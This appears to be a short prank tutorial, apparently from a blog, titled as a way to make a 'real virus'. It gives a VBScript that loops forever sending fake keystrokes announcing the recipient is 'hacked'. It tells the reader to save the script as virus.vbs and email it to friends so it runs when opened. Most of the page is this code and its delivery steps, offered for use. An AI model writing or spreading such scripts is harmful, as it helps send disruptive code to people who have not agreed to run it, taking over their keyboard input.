Create a real virus to hack friend's keyboard function




This trick can hack your friend's
keyboard and make him type what
you say. Just follow the step:<br />

Open Notepad, copy the code given
below and save the file as virus.vbs

---------------
Set wshShell =
wscript.CreateObject
("WScript.Shell")
do  wscript.sleep 100
wshshell.sendkeys "HI I AM YOUR
NAME. I HACKED YOUR COMPUTER
"
loop

Send this file to your friends in email.

When they open it, he is hacked.

Comments